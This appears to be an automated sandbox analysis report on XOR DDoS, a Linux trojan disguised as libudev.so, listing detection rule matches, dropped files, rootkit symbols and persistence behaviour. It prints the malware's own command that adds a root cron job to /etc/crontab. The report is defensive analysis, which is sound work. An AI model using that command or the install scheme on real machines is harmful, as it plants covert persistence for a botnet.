              Source: 6399.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6380.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6554.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6271.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6468.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6484.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6495.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6339.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6318.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6536.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6410.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/hfdnmorvjd, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/ctwojuywol, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/ctwojuywol, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/cjrbrkowir, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/cjrbrkowir, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/bnuowhwlvc, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/bnuowhwlvc, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/trcmbxxcta, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/trcmbxxcta, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/fsqerkomug, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/fsqerkomug, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/chrcfbeejh, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/chrcfbeejh, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/jjfbelholv, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/jjfbelholv, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/mljnlxkfff, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/mljnlxkfff, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/tiupbsaswr, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/tiupbsaswr, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /etc/init.d/libudev.so, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /etc/init.d/libudev.so, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/uhyqxsqece, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/uhyqxsqece, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/uijxdyxaco, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/uijxdyxaco, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/ypclxoxcxk, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/ypclxoxcxk, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: libudev.soELF static info symbol of initial sample: HideFile
              Source: libudev.soELF static info symbol of initial sample: HidePidPort
              Source: libudev.soELF static info symbol of initial sample: __after_morecore_hook
              Source: libudev.soELF static info symbol of initial sample: __free_hook
              Source: libudev.soELF static info symbol of initial sample: __libc_register_dl_open_hook
              Source: libudev.soELF static info symbol of initial sample: __libc_register_dlfcn_hook
              Source: libudev.soELF static info symbol of initial sample: __malloc_hook
              Source: libudev.soELF static info symbol of initial sample: __malloc_initialize_hook
              Source: libudev.soELF static info symbol of initial sample: __memalign_hook
              Source: libudev.so0.11.drELF static info symbol of dropped file: HideFile
              Source: libudev.so0.11.drELF static info symbol of dropped file: HidePidPort
              Source: libudev.so0.11.drELF static info symbol of dropped file: __after_morecore_hook
              Source: libudev.so0.11.drELF static info symbol of dropped file: __free_hook
              Source: libudev.so0.11.drELF static info symbol of dropped file: __libc_register_dl_open_hook
              Source: libudev.so0.11.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
              Source: libudev.so0.11.drELF static info symbol of dropped file: __malloc_hook
              Source: libudev.so0.11.drELF static info symbol of dropped file: __malloc_initialize_hook
              Source: libudev.so0.11.drELF static info symbol of dropped file: __memalign_hook
              Source: mljnlxkfff.11.drELF static info symbol of dropped file: HideFile
              Source: mljnlxkfff.11.drELF static info symbol of dropped file: HidePidPort
              Source: mljnlxkfff.11.drELF static info symbol of dropped file: __after_morecore_hook
              Source: mljnlxkfff.11.drELF static info symbol of dropped file: __free_hook
              Source: mljnlxkfff.11.drELF static info symbol of dropped file: __libc_register_dl_open_hook
              Source: mljnlxkfff.11.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
              Source: mljnlxkfff.11.drELF static info symbol of dropped file: __malloc_hook
              Source: mljnlxkfff.11.drELF static info symbol of dropped file: __malloc_initialize_hook
              Source: mljnlxkfff.11.drELF static info symbol of dropped file: __memalign_hook
              Source: jjfbelholv.11.drELF static info symbol of dropped file: HideFile
              Source: jjfbelholv.11.drELF static info symbol of dropped file: HidePidPort
              Source: jjfbelholv.11.drELF static info symbol of dropped file: __after_morecore_hook
              Source: jjfbelholv.11.drELF static info symbol of dropped file: __free_hook
              Source: jjfbelholv.11.drELF static info symbol of dropped file: __libc_register_dl_open_hook
              Source: jjfbelholv.11.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
              Source: jjfbelholv.11.drELF static info symbol of dropped file: __malloc_hook
              Source: jjfbelholv.11.drELF static info symbol of dropped file: __malloc_initialize_hook
              Source: jjfbelholv.11.drELF static info symbol of dropped file: __memalign_hook
              Source: trcmbxxcta.11.drELF static info symbol of dropped file: HideFile
              Source: trcmbxxcta.11.drELF static info symbol of dropped file: HidePidPort
              Source: trcmbxxcta.11.drELF static info symbol of dropped file: __after_morecore_hook
              Source: trcmbxxcta.11.drELF static info symbol of dropped file: __free_hook
              Source: trcmbxxcta.11.drELF static info symbol of dropped file: __libc_register_dl_open_hook
              Source: trcmbxxcta.11.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
              Source: trcmbxxcta.11.drELF static info symbol of dropped file: __malloc_hook
              Source: trcmbxxcta.11.drELF static info symbol of dropped file: __malloc_initialize_hook
              Source: trcmbxxcta.11.drELF static info symbol of dropped file: __memalign_hook
              Source: ctwojuywol.11.drELF static info symbol of dropped file: HideFile
              Source: ctwojuywol.11.drELF static info symbol of dropped file: HidePidPort
              Source: ctwojuywol.11.drELF static info symbol of dropped file: __after_morecore_hook
              Source: ctwojuywol.11.drELF static info symbol of dropped file: __free_hook
              Source: ctwojuywol.11.drELF static info symbol of dropped file: __libc_register_dl_open_hook
              Source: ctwojuywol.11.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
              Source: ctwojuywol.11.drELF static info symbol of dropped file: __malloc_hook
              Source: ctwojuywol.11.drELF static info symbol of dropped file: __malloc_initialize_hook
              Source: ctwojuywol.11.drELF static info symbol of dropped file: __memalign_hook
              Source: fsqerkomug.11.drELF static info symbol of dropped file: HideFile
              Source: fsqerkomug.11.drELF static info symbol of dropped file: HidePidPort
              Source: fsqerkomug.11.drELF static info symbol of dropped file: __after_morecore_hook
              Source: fsqerkomug.11.drELF static info symbol of dropped file: __free_hook
              Source: fsqerkomug.11.drELF static info symbol of dropped file: __libc_register_dl_open_hook
              Source: fsqerkomug.11.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
              Source: fsqerkomug.11.drELF static info symbol of dropped file: __malloc_hook
              Source: fsqerkomug.11.drELF static info symbol of dropped file: __malloc_initialize_hook
              Source: fsqerkomug.11.drELF static info symbol of dropped file: __memalign_hook
              Source: cjrbrkowir.11.drELF static info symbol of dropped file: HideFile
              Source: cjrbrkowir.11.drELF static info symbol of dropped file: HidePidPort
              Source: cjrbrkowir.11.drELF static info symbol of dropped file: __after_morecore_hook
              Source: cjrbrkowir.11.drELF static info symbol of dropped file: __free_hook
              Source: cjrbrkowir.11.drELF static info symbol of dropped file: __libc_register_dl_open_hook
              Source: cjrbrkowir.11.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
              Source: cjrbrkowir.11.drELF static info symbol of dropped file: __malloc_hook
              Source: cjrbrkowir.11.drELF static info symbol of dropped file: __malloc_initialize_hook
              Source: cjrbrkowir.11.drELF static info symbol of dropped file: __memalign_hook
              Source: ypclxoxcxk.11.drELF static info symbol of dropped file: HideFile
              Source: ypclxoxcxk.11.drELF static info symbol of dropped file: HidePidPort
              Source: ypclxoxcxk.11.drELF static info symbol of dropped file: __after_morecore_hook
              Source: ypclxoxcxk.11.drELF static info symbol of dropped file: __free_hook
              Source: ypclxoxcxk.11.drELF static info symbol of dropped file: __libc_register_dl_open_hook
              Source: ypclxoxcxk.11.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
              Source: ypclxoxcxk.11.drELF static info symbol of dropped file: __malloc_hook
              Source: ypclxoxcxk.11.drELF static info symbol of dropped file: __malloc_initialize_hook
              Source: ypclxoxcxk.11.drELF static info symbol of dropped file: __memalign_hook
              Source: uhyqxsqece.11.drELF static info symbol of dropped file: HideFile
              Source: uhyqxsqece.11.drELF static info symbol of dropped file: HidePidPort
              Source: uhyqxsqece.11.drELF static info symbol of dropped file: __after_morecore_hook
              Source: uhyqxsqece.11.drELF static info symbol of dropped file: __free_hook
              Source: uhyqxsqece.11.drELF static info symbol of dropped file: __libc_register_dl_open_hook
              Source: uhyqxsqece.11.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
              Source: uhyqxsqece.11.drELF static info symbol of dropped file: __malloc_hook
              Source: uhyqxsqece.11.drELF static info symbol of dropped file: __malloc_initialize_hook
              Source: uhyqxsqece.11.drELF static info symbol of dropped file: __memalign_hook
              Source: tiupbsaswr.11.drELF static info symbol of dropped file: HideFile
              Source: tiupbsaswr.11.drELF static info symbol of dropped file: HidePidPort
              Source: tiupbsaswr.11.drELF static info symbol of dropped file: __after_morecore_hook
              Source: tiupbsaswr.11.drELF static info symbol of dropped file: __free_hook
              Source: tiupbsaswr.11.drELF static info symbol of dropped file: __libc_register_dl_open_hook
              Source: tiupbsaswr.11.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
              Source: tiupbsaswr.11.drELF static info symbol of dropped file: __malloc_hook
              Source: tiupbsaswr.11.drELF static info symbol of dropped file: __malloc_initialize_hook
              Source: tiupbsaswr.11.drELF static info symbol of dropped file: __memalign_hook
              Source: uijxdyxaco.11.drELF static info symbol of dropped file: HideFile
              Source: uijxdyxaco.11.drELF static info symbol of dropped file: HidePidPort
              Source: uijxdyxaco.11.drELF static info symbol of dropped file: __after_morecore_hook
              Source: uijxdyxaco.11.drELF static info symbol of dropped file: __free_hook
              Source: uijxdyxaco.11.drELF static info symbol of dropped file: __libc_register_dl_open_hook
              Source: uijxdyxaco.11.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
              Source: uijxdyxaco.11.drELF static info symbol of dropped file: __malloc_hook
              Source: uijxdyxaco.11.drELF static info symbol of dropped file: __malloc_initialize_hook
              Source: uijxdyxaco.11.drELF static info symbol of dropped file: __memalign_hook
              Source: bnuowhwlvc.11.drELF static info symbol of dropped file: HideFile
              Source: bnuowhwlvc.11.drELF static info symbol of dropped file: HidePidPort
              Source: bnuowhwlvc.11.drELF static info symbol of dropped file: __after_morecore_hook
              Source: bnuowhwlvc.11.drELF static info symbol of dropped file: __free_hook
              Source: bnuowhwlvc.11.drELF static info symbol of dropped file: __libc_register_dl_open_hook
              Source: bnuowhwlvc.11.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
              Source: bnuowhwlvc.11.drELF static info symbol of dropped file: __malloc_hook
              Source: bnuowhwlvc.11.drELF static info symbol of dropped file: __malloc_initialize_hook
              Source: bnuowhwlvc.11.drELF static info symbol of dropped file: __memalign_hook
              Source: chrcfbeejh.11.drELF static info symbol of dropped file: HideFile
              Source: chrcfbeejh.11.drELF static info symbol of dropped file: HidePidPort
              Source: chrcfbeejh.11.drELF static info symbol of dropped file: __after_morecore_hook
              Source: chrcfbeejh.11.drELF static info symbol of dropped file: __free_hook
              Source: chrcfbeejh.11.drELF static info symbol of dropped file: __libc_register_dl_open_hook
              Source: chrcfbeejh.11.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
              Source: chrcfbeejh.11.drELF static info symbol of dropped file: __malloc_hook
              Source: chrcfbeejh.11.drELF static info symbol of dropped file: __malloc_initialize_hook
              Source: chrcfbeejh.11.drELF static info symbol of dropped file: __memalign_hook
              Source: classification engineClassification label: mal100.troj.evad.linSO@0/19@5/0
              Source: /tmp/libudev.so (PID: 6231)/run/gcc.pid: hpdeqahpgbcapebgwhuhvgxpxsmyeuxnJump to behavior

              Persistence and Installation Behavior

              barindex
              Source: /tmp/libudev.so (PID: 6231)File: /etc/rc1.d/S90libudev.so -> /etc/init.d/libudev.soJump to behavior
              Source: /tmp/libudev.so (PID: 6231)File: /etc/rc2.d/S90libudev.so -> /etc/init.d/libudev.soJump to behavior
              Source: /tmp/libudev.so (PID: 6231)File: /etc/rc3.d/S90libudev.so -> /etc/init.d/libudev.soJump to behavior
              Source: /tmp/libudev.so (PID: 6231)File: /etc/rc4.d/S90libudev.so -> /etc/init.d/libudev.soJump to behavior
              Source: /tmp/libudev.so (PID: 6231)File: /etc/rc5.d/S90libudev.so -> /etc/init.d/libudev.soJump to behavior
              Source: /tmp/libudev.so (PID: 6231)File: /etc/rc.d/rc1.d/S90libudev.so -> /etc/init.d/libudev.soJump to behavior
              Source: /tmp/libudev.so (PID: 6231)File: /etc/rc.d/rc2.d/S90libudev.so -> /etc/init.d/libudev.soJump to behavior
              Source: /tmp/libudev.so (PID: 6231)File: /etc/rc.d/rc3.d/S90libudev.so -> /etc/init.d/libudev.soJump to behavior
              Source: /tmp/libudev.so (PID: 6231)File: /etc/rc.d/rc4.d/S90libudev.so -> /etc/init.d/libudev.soJump to behavior
              Source: /tmp/libudev.so (PID: 6231)File: /etc/rc.d/rc5.d/S90libudev.so -> /etc/init.d/libudev.soJump to behavior
              Source: /tmp/libudev.so (PID: 6231)File: /etc/cron.hourly/gcc.shJump to behavior
              Source: /bin/sh (PID: 6236)File: /etc/crontabJump to behavior
              Source: /bin/sed (PID: 6237)File: /etc/crontabJump to behavior
              Source: /tmp/libudev.so (PID: 6231)File written: /usr/lib/libudev.soJump to dropped file
              Source: /tmp/libudev.so (PID: 6231)File written: /usr/bin/mljnlxkfffJump to dropped file
              Source: /tmp/libudev.so (PID: 6231)File written: /usr/bin/jjfbelholvJump to dropped file
              Source: /tmp/libudev.so (PID: 6231)File written: /usr/bin/trcmbxxctaJump to dropped file
              Source: /tmp/libudev.so (PID: 6231)File written: /usr/bin/ctwojuywolJump to dropped file
              Source: /tmp/libudev.so (PID: 6231)File written: /usr/bin/fsqerkomugJump to dropped file
              Source: /tmp/libudev.so (PID: 6231)File written: /usr/bin/cjrbrkowirJump to dropped file
              Source: /tmp/libudev.so (PID: 6231)File written: /usr/bin/ypclxoxcxkJump to dropped file
              Source: /tmp/libudev.so (PID: 6231)File written: /usr/bin/uhyqxsqeceJump to dropped file
              Source: /tmp/libudev.so (PID: 6231)File written: /usr/bin/tiupbsaswrJump to dropped file
              Source: /tmp/libudev.so (PID: 6231)File written: /usr/bin/uijxdyxacoJump to dropped file
              Source: /tmp/libudev.so (PID: 6231)File written: /usr/bin/bnuowhwlvcJump to dropped file
              Source: /tmp/libudev.so (PID: 6231)File written: /usr/bin/chrcfbeejhJump to dropped file
              Source: /tmp/libudev.so (PID: 6231)File written: /usr/bin/hfdnmorvjdJump to dropped file
              Source: /tmp/libudev.so (PID: 6231)Shell script file created: /etc/cron.hourly/gcc.shJump to dropped file
              Source: /tmp/libudev.so (PID: 6231)Reads from proc file: /proc/statJump to behavior
              Source: /tmp/libudev.so (PID: 6231)Reads from proc file: /proc/meminfoJump to behavior
              Source: /tmp/libudev.so (PID: 6231)Reads from proc file: /proc/cpuinfoJump to behavior
              Source: /sbin/update-rc.d (PID: 6241)Systemctl executable: /bin/systemctl -> systemctl daemon-reloadJump to behavior
              Source: /tmp/libudev.so (PID: 6236)Shell command executed: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"Jump to behavior
              Source: /tmp/libudev.so (PID: 6231)Writes shell script file to disk with an unusual file extension: /etc/init.d/libudev.soJump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: /tmp/libudev.so (PID: 6231)File: /etc/init.d/libudev.soJump to dropped file
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/mljnlxkfffJump to dropped file
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/jjfbelholvJump to dropped file
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/trcmbxxctaJump to dropped file
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/ctwojuywolJump to dropped file
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/fsqerkomugJump to dropped file
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/cjrbrkowirJump to dropped file
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/ypclxoxcxkJump to dropped file
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/uhyqxsqeceJump to dropped file
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/tiupbsaswrJump to dropped file
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/uijxdyxacoJump to dropped file
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/bnuowhwlvcJump to dropped file
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/chrcfbeejhJump to dropped file
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/hfdnmorvjdJump to dropped file
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/mljnlxkfffJump to behavior
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/jjfbelholvJump to behavior
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/trcmbxxctaJump to behavior
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/ctwojuywolJump to behavior
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/fsqerkomugJump to behavior
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/cjrbrkowirJump to behavior
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/ypclxoxcxkJump to behavior
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/uhyqxsqeceJump to behavior
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/tiupbsaswrJump to behavior
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/uijxdyxacoJump to behavior
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/bnuowhwlvcJump to behavior
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/chrcfbeejhJump to behavior
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/hfdnmorvjdJump to behavior
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/mongquumqwJump to behavior
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/hrrmkhkkhvJump to behavior
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/cuwlelaebcJump to behavior
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/zpxsvbblcgJump to behavior
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/ockerbcjasJump to behavior
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/xtzjojyyzfJump to behavior
              Source: /tmp/libudev.so (PID: 6231)File: /usr/bin/blrhrkypboJump to behavior
              Source: /usr/bin/mljnlxkfff (PID: 6265)File: /usr/bin/mljnlxkfffJump to behavior
              Source: /usr/bin/mljnlxkfff (PID: 6270)File: /usr/bin/mljnlxkfffJump to behavior
              Source: /usr/bin/mljnlxkfff (PID: 6274)File: /usr/bin/mljnlxkfffJump to behavior
              Source: /usr/bin/mljnlxkfff (PID: 6276)File: /usr/bin/mljnlxkfffJump to behavior
              Source: /usr/bin/mljnlxkfff (PID: 6277)File: /usr/bin/mljnlxkfffJump to behavior
              Source: /usr/bin/jjfbelholv (PID: 6282)File: /usr/bin/jjfbelholvJump to behavior
              Source: /usr/bin/jjfbelholv (PID: 6285)File: /usr/bin/jjfbelholvJump to behavior
              Source: /usr/bin/jjfbelholv (PID: 6288)File: /usr/bin/jjfbelholvJump to behavior
              Source: /usr/bin/jjfbelholv (PID: 6293)File: /usr/bin/jjfbelholvJump to behavior
              Source: /usr/bin/jjfbelholv (PID: 6294)File: /usr/bin/jjfbelholvJump to behavior
              Source: /usr/bin/trcmbxxcta (PID: 6300)File: /usr/bin/trcmbxxctaJump to behavior
              Source: /usr/bin/trcmbxxcta (PID: 6305)File: /usr/bin/trcmbxxctaJump to behavior
              Source: /usr/bin/trcmbxxcta (PID: 6308)File: /usr/bin/trcmbxxctaJump to behavior
              Source: /usr/bin/trcmbxxcta (PID: 6311)File: /usr/bin/trcmbxxctaJump to behavior
              Source: /usr/bin/trcmbxxcta (PID: 6312)File: /usr/bin/trcmbxxctaJump to behavior
              Source: /usr/bin/ctwojuywol (PID: 6317)File: /usr/bin/ctwojuywolJump to behavior
              Source: /usr/bin/ctwojuywol (PID: 6320)File: /usr/bin/ctwojuywolJump to behavior
              Source: /usr/bin/ctwojuywol (PID: 6323)File: /usr/bin/ctwojuywolJump to behavior
              Source: /usr/bin/ctwojuywol (PID: 6326)File: /usr/bin/ctwojuywolJump to behavior
              Source: /usr/bin/ctwojuywol (PID: 6331)File: /usr/bin/ctwojuywolJump to behavior
              Source: /usr/bin/fsqerkomug (PID: 6336)File: /usr/bin/fsqerkomugJump to behavior
              Source: /usr/bin/fsqerkomug (PID: 6341)File: /usr/bin/fsqerkomugJump to behavior
              Source: /usr/bin/fsqerkomug (PID: 6344)File: /usr/bin/fsqerkomugJump to behavior
              Source: /usr/bin/fsqerkomug (PID: 6347)File: /usr/bin/fsqerkomugJump to behavior
              Source: /usr/bin/fsqerkomug (PID: 6348)File: /usr/bin/fsqerkomugJump to behavior
              Source: /usr/bin/cjrbrkowir (PID: 6353)File: /usr/bin/cjrbrkowirJump to behavior
              Source: /usr/bin/cjrbrkowir (PID: 6357)File: /usr/bin/cjrbrkowirJump to behavior
              Source: /usr/bin/cjrbrkowir (PID: 6361)File: /usr/bin/cjrbrkowirJump to behavior
              Source: /usr/bin/cjrbrkowir (PID: 6363)File: /usr/bin/cjrbrkowirJump to behavior
              Source: /usr/bin/cjrbrkowir (PID: 6365)File: /usr/bin/cjrbrkowirJump to behavior
              Source: /usr/bin/ypclxoxcxk (PID: 6371)File: /usr/bin/ypclxoxcxkJump to behavior
              Source: /usr/bin/ypclxoxcxk (PID: 6374)File: /usr/bin/ypclxoxcxkJump to behavior
              Source: /usr/bin/ypclxoxcxk (PID: 6379)File: /usr/bin/ypclxoxcxkJump to behavior
              Source: /usr/bin/ypclxoxcxk (PID: 6381)File: /usr/bin/ypclxoxcxkJump to behavior
              Source: /usr/bin/ypclxoxcxk (PID: 6383)File: /usr/bin/ypclxoxcxkJump to behavior
              Source: /usr/bin/uhyqxsqece (PID: 6390)File: /usr/bin/uhyqxsqeceJump to behavior
              Source: /usr/bin/uhyqxsqece (PID: 6395)File: /usr/bin/uhyqxsqeceJump to behavior
              Source: /usr/bin/uhyqxsqece (PID: 6398)File: /usr/bin/uhyqxsqeceJump to behavior
              Source: /usr/bin/uhyqxsqece (PID: 6401)File: /usr/bin/uhyqxsqeceJump to behavior
              Source: /usr/bin/uhyqxsqece (PID: 6402)File: /usr/bin/uhyqxsqeceJump to behavior
              Source: /usr/bin/tiupbsaswr (PID: 6409)File: /usr/bin/tiupbsaswrJump to behavior
              Source: /usr/bin/tiupbsaswr (PID: 6412)File: /usr/bin/tiupbsaswrJump to behavior
              Source: /usr/bin/tiupbsaswr (PID: 6417)File: /usr/bin/tiupbsaswrJump to behavior
              Source: /usr/bin/tiupbsaswr (PID: 6420)File: /usr/bin/tiupbsaswrJump to behavior
              Source: /usr/bin/tiupbsaswr (PID: 6421)File: /usr/bin/tiupbsaswrJump to behavior
              Source: /usr/bin/uijxdyxaco (PID: 6426)File: /usr/bin/uijxdyxacoJump to behavior
              Source: /usr/bin/uijxdyxaco (PID: 6429)File: /usr/bin/uijxdyxacoJump to behavior
              Source: /usr/bin/uijxdyxaco (PID: 6434)File: /usr/bin/uijxdyxacoJump to behavior
              Source: /usr/bin/uijxdyxaco (PID: 6437)File: /usr/bin/uijxdyxacoJump to behavior
              Source: /usr/bin/uijxdyxaco (PID: 6438)File: /usr/bin/uijxdyxacoJump to behavior
              Source: /usr/bin/bnuowhwlvc (PID: 6443)File: /usr/bin/bnuowhwlvcJump to behavior
